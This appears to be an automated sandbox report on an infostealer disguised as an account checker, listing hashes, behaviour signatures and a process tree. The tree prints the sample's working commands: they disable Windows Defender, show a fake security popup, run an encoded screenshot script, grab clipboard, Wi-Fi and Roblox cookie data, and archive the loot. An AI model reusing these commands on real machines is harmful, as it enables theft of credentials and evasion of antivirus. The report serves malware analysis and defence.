Analysis

  • max time kernel
    17s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-07-2024 15:03

General

  • Target

    Nexus Checker/Nexus Acc Verifyer.exe

  • Size

    6.9MB

  • MD5

    b67e6e2c2fb01f4d40d5812652d41ec3

  • SHA1

    b562852aee42c86ce3219a953b7a5c7619698696

  • SHA256

    8e518cdb6657cc1e277c9473866eda5bcaeaeab328b8bf5368ab658be32791de

  • SHA512

    9a5137a84de557c6fff7ac211190ccac98a92a480f3f5ccc4c15ccc367f202fbae1c1860826d63969009b4832311c5a42fb71117ef3263bf16b8673e3bb0152f

  • SSDEEP

    98304:FRkwN+MdA5wqM5AKL8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DoDZDJ1n6hBn7:FRV15IB6ylnlPzf+JiJCsmFMvcn6hVvj

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe
    "C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3304
    • C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe
      "C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:60
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3812
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please verify your windows system and make sure every windows security update is installed', 0, 'System outdated', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3780
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please verify your windows system and make sure every windows security update is installed', 0, 'System outdated', 0+16);close()"
          4⤵
            PID:3988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2120
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2300
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4464
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3208
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:5048
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2108
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:740
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4088
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:4544
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1712
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:2712
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe""
              3⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:2272
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexus Checker\Nexus Acc Verifyer.exe"
                4⤵
                • Views/modifies file attributes
                PID:800
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3140
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4132
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3556
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2436
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4432
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4648
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:1336
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:4276
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                    PID:1824
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-Clipboard
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1188
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    3⤵
                      PID:3096
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        4⤵
                        • Enumerates processes with tasklist
                        PID:1484
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:984
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2460
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                          3⤵
                            PID:2524
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profile
                              4⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:1796
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "systeminfo"
                            3⤵
                              PID:1004
                              • C:\Windows\system32\systeminfo.exe
                                systeminfo
                                4⤵
                                • Gathers system information
                                PID:4500
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                              3⤵
                                PID:4672
                                • C:\Windows\system32\reg.exe
                                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                  4⤵
                                    PID:1864
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                  3⤵
                                    PID:4756
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2792
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nsywmio3\nsywmio3.cmdline"
                                        5⤵
                                          PID:3960
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87CD.tmp" "c:\Users\Admin\AppData\Local\Temp\nsywmio3\CSC1A681DEFF1AD402DB7B9E9867765C8B.TMP"
                                            6⤵
                                              PID:800
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:4424
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:3460
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                            3⤵
                                              PID:1052
                                              • C:\Windows\system32\attrib.exe
                                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:992
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:1956
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:852
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                  3⤵
                                                    PID:3260
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                                      4⤵
                                                      • Drops file in Drivers directory
                                                      • Views/modifies file attributes
                                                      PID:4672
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:4468
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:3208
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:4516
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:2324
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:3656
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:3684
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                              3⤵
                                                                PID:2396
                                                                • C:\Windows\system32\tree.com
                                                                  tree /A /F
                                                                  4⤵
                                                                    PID:4056
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  3⤵
                                                                    PID:5116
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3460
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:4000
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        4⤵
                                                                          PID:3656
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                          4⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:1796
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                                        3⤵
                                                                          PID:4532
                                                                          • C:\Windows\system32\getmac.exe
                                                                            getmac
                                                                            4⤵
                                                                              PID:4976
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI33042\rar.exe a -r -hp"deep" "C:\Users\Admin\AppData\Local\Temp\FtEfl.zip" *"
                                                                            3⤵
                                                                              PID:1904
                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI33042\rar.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI33042\rar.exe a -r -hp"deep" "C:\Users\Admin\AppData\Local\Temp\FtEfl.zip" *
